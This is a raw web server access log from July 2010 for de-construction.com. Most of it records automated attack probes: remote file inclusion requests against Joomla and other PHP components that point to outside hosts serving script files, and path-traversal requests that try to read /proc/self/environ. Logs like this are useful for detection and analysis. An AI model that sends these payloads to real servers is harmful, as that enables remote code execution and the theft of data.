213.189.224.16 - - [01/Jul/2010:17:13:11 -0700] "GET /logs/access_100331.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:17:13:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:17:13:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:17:13:31 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:17:16:20 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:17:19:21 -0700] "GET /logs/access_100531.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:19:56 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:19:56 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:19:56 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:17:20:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:17:20:34 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:17:20:34 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:22:31 -0700] "GET /logs/access_100601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:23:06 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:23:06 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:23:06 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:17:25:28 -0700] "GET /logs/access_100601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.195.215.200 - - [01/Jul/2010:17:33:14 -0700] "GET /scanhttp://myhomemygarden.com.au/images/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.de-construction.com"
213.195.215.200 - - [01/Jul/2010:17:33:15 -0700] "GET /logs/scanhttp://myhomemygarden.com.au/images/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.de-construction.com"
85.91.67.17 - - [01/Jul/2010:17:53:02 -0700] "GET /logs/access_100601.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.91.67.17 - - [01/Jul/2010:17:53:02 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.91.67.17 - - [01/Jul/2010:17:53:02 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.91.67.17 - - [01/Jul/2010:17:53:32 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.91.67.17 - - [01/Jul/2010:17:53:32 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.91.67.17 - - [01/Jul/2010:17:53:32 -0700] "GET /logs/access_100601.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
95.108.247.251 - - [01/Jul/2010:17:56:10 -0700] "GET /logs/access_100601.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:14:48 -0700] "GET /logs/access_100601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:14:48 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:14:48 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:18:14:57 -0700] "GET /logs/access_100531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:18:14:57 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:18:14:58 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:16:35 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:16:35 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:16:37 -0700] "GET /logs/access_100601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:24:40 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:24:40 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:18:24:42 -0700] "GET /logs/access_100601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:25:18 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:25:19 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:28:22 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
95.108.150.235 - - [01/Jul/2010:18:34:30 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "de-construction.com"
95.108.150.235 - - [01/Jul/2010:18:34:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.de-construction.com"
95.108.150.235 - - [01/Jul/2010:18:34:31 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "de-construction.com"
95.108.150.235 - - [01/Jul/2010:18:34:31 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.de-construction.com"
95.108.150.235 - - [01/Jul/2010:18:34:32 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "de-construction.com"
95.108.150.235 - - [01/Jul/2010:18:34:32 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.de-construction.com"
202.60.234.22 - - [01/Jul/2010:18:36:33 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:36:42 -0700] "GET /logs/access_100601.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:36:42 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:36:43 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:48:08 -0700] "GET /logs/access_100601.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:48:09 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:18:48:09 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:00 -0700] "GET /logs/access_100531.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:00 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:00 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:08 -0700] "GET /logs/access.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:08 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:08 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:19 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:19 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:50:19 -0700] "GET /logs/access.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:53:31 -0700] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:53:31 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:53:31 -0700] "GET /logs/access_100531.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:56:26 -0700] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:56:26 -0700] "GET /logs/access.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:56:26 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:56:29 -0700] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:56:29 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:18:56:29 -0700] "GET /logs/access.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:07:31 -0700] "GET /logs/access_100601.log%20%20/solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:07:31 -0700] "GET /logs/solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:07:31 -0700] "GET /solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:07:43 -0700] "GET /solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:07:43 -0700] "GET /logs/access_100601.log/solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:07:43 -0700] "GET /logs/solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:19:08:32 -0700] "GET /logs/access_100331.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:14:25 -0700] "GET /solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:14:25 -0700] "GET /logs/solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:14:25 -0700] "GET /logs/access_100601.log%20%20/solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:19:20:48 -0700] "GET /logs/access.log/solpot.html?body=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.170.45.162 - - [01/Jul/2010:19:40:58 -0700] "GET /logs/access_100331.log//index.php?option=com_remository&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.de-construction.com"
79.170.45.162 - - [01/Jul/2010:19:40:58 -0700] "GET /index.php?option=com_remository&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.de-construction.com"
79.170.45.162 - - [01/Jul/2010:19:40:58 -0700] "GET /logs//index.php?option=com_remository&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:10 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:12 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:12 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:22 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:22 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:22 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:54 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:54 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:02:54 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:08:24 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:20:09:12 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
207.218.231.66 - - [01/Jul/2010:20:15:28 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:17:57 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:18:28 -0700] "GET /logs/access_100531.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:18:28 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:18:29 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:25:55 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
213.160.169.74 - - [01/Jul/2010:20:25:56 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:20:26:54 -0700] "GET /logs/?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.79" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:20:26:55 -0700] "GET /?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.de-construction.com"
207.218.231.66 - - [01/Jul/2010:20:30:27 -0700] "GET /logs/access_100601.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
207.218.231.66 - - [01/Jul/2010:20:30:27 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
207.218.231.66 - - [01/Jul/2010:20:30:27 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
189.113.97.250 - - [01/Jul/2010:20:37:14 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:20:37:31 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:20:37:31 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:20:37:31 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
